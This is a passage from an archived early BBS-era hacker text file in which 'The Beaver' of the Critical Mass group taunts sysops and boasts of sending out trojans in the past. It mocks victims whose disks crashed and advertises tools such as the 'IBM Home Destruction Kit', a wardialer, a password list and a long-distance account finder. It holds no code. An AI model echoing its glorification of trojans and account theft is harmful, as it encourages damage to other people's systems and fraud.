or any of the software that myself, or anybody associated with Critical Mass
puts out, please contact us and not the people we know. Don't hassle them,
hassle me. Its fun to see how stupid you guys can be. Besides, if you don't
like it, don't download it! Its as easy as that.
I have had several people tell me (not directly) that they are going
to follow up on legal actions against me because there BBS's hard disks have
crashed. Well, I envite them to for the following reasons.........

1. I have not crashed ANYONE's hard disk. If I did you would know. I'm not
affraid to to say 'I did it'. Based on the last trojans I have sent out,
and yes I did in my COMMIE years, my name was beside the program all the
way.
2. Even if I did, you don't know my name, phone number, or address. Think
about it.
3. If you really thought a 22 byte long file was a 'killer game' or what not,
you shouldn't have a hard disk in the first place.
4. If I hit you, you would know, instead of a little trojan. I prefer virsues,
EVEN THOUGH I HAVE NEVER SENT ONE OUT.


Actually, I expected alot of E-mail from people that where pissed
about the IBM Home Destruction Kit, but I was taken by the positive E-mail
I got. It really threw me off! I like it though, so please keep sending your
E-mail in about question, comments, insults you have. Its great. I can now
be contacted at one of the following places............ Under the name 'The
Beaver'.......

Warriers Retreat
(904) 422-3606

and

The Reactor BBS
(904) 878-1736



Please E-mail me. I enjoy it. The following software can be picked
up at 'The Reactor BBS'.............

The IBM Home Destruction Kit (v1.4)
Critcal Mass#1 (138k+ of hack info!)
SC/HA ToolBox Hacker! (v3.0) COMMING SOON!!!!!!!!!! INCLUDES!!!!!!!!!
WarGame Dialer
Repeat Dialer
Sleep Function
Dbase Hack (490+ most popular passwords!)
LD account finder!
Much more

Theses are written by myself, other software by other members includes......

The c64-128 Home Destruction Kit! (v1.0?) COMMING SOON (by The Beaver)
ToolBox Hacker 1.0 for the IBM
c64
Apple
Amiga (By The Shadow) COMMING SOON!


Just keep a eye out for these, and other (if they agree to it)
GrindLock products!


Once again, Thanx To: All Florida area FIRN hackers, SF's and C.C.C
Abigail, The Shadow (very special thanks to
him), Eric, all korner hacker who give info,
Killer (keep at it), The Baron, The Nut-Kracker
My Dad (yes he knows I hack), and every hacker
in the TLH area for just exsisting! And of
course Mark for letting me use his board to
post CM here in town, even though he get's
hassled for it. All old C.C members that still
hack. Pink Floyd, for the nylon. And much more!


No Thanx Too, Once again: Doug, for nothing. All NFSA sysops, except for
a few. Tom and Bob, after I thought they where
ok guys (and I still do) for saying that I u/l
trojans when I didn't. Why guys? Tally Net
sysops, for killing this text. That remote off
Legal3. All sysops that killed this text.


Note: When I say 'no thanx to', its not a 'hit list', but it made me kind of
mad.


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT